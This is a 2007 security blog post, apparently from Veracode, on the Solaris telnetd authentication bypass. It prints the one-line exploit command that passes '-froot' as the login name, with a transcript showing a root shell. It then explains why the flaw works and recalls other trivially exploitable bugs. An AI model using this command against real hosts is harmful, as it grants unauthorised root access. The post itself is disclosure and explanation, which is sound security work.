Skip to main content
February 12, 2007

Stupid Solaris Tricks, and a Brief Retrospective

An annoyingly stupid vulnerability in the stock Solaris 10/11 telnet daemon, courtesy of Full Disclosure (more details in this PDF, but it's NSFW): Pass "-f[user]" as the "-l" option to telnet, and presto, you bypass the entire authentication process and are logged in as the user of your choice! Works for the root user too, as long as the server is configured to allow remote root logins.

[email protected] [~]$ telnet a.b.c.d -l "-froot"
Trying a.b.c.d...
Connected to a.b.c.d.
Escape character is '^]'.
Last login: Thu Feb  1 02:28:29 from w.x.y.z
JESv4 Message of The Day (MOTD)

Welcome to the Sun Java Enterprise System 2005Q4!

[a.b.c.d ~]#id
uid=0(root) gid=0(root)
[a.b.c.d ~]#uname -a
SunOS a.b.c.d 5.10 Generic_118844-26 i86pc i386 i86pc

Amazing, isn't it? This works because in.telnetd exec's the Solaris login program to perform authentication. It passes the user-supplied "-l" option as a command line argument to login, which in turn supports an "-f" option that bypasses the authentication process if login was invoked by the root user. Since in.telnet.d is running as root, login inherits these privileges and happily carries out the request to bypass authentication.

This is fun to laugh at and all, but it falls into that scary category of "trivially exploitable" vulnerabilities -- those that are so easy to exploit that you don't even need special tools, not even a shell script (though the original advisory for this bug jokingly includes a script, marked "CLASSIFIED CONFIDENTIAL SOURCE MATERIAL" -- cute).

Trivially exploitable vulnerabilities have caused a lot of trouble in the past, as everyone with a shell prompt would test it out to see if it worked (admit it, you probably tried to telnet to your nearest Solaris 10 box before you read this far). Think back to the mid-90s and the infamous Ping of Death, in which an overly long ICMP payload would DoS most TCP/IP stacks, thanks to the Windows ping command permitting payload sizes longer than it should.

Ironically, Sun released an advisory just a couple weeks ago for an issue whereby a single ICMP packet causes a kernel panic and Denial of Service on a Solaris 10 box. No details on packet construction, but they do provide a stack trace which should aid in tracking down the bug, if one were so inclined.

If you really want to flip back in the history books, look up the WIZ command in sendmail, which was one of several vulnerabilities the famous Morris Worm used to propagate. Elegant attack -- just type WIZ and you'd get a shell. How far we've come in 19 years!

What's the best (read: funniest) "trivially exploitable" vulnerability that you've encountered over the years? Leave a comment.

Related Content

Chris Eng, Chief Research Officer, is responsible for integrating security expertise into Veracode’s technology. In addition to helping define and prioritize the security feature set of the Veracode service, he consults frequently with customers to discuss and advance their application security initiatives. With over 15 years of experience in application security, Chris brings a wealth of practical expertise to Veracode.

Love to learn about Application Security?

Get all the latest news, tips and articles delivered right to your inbox.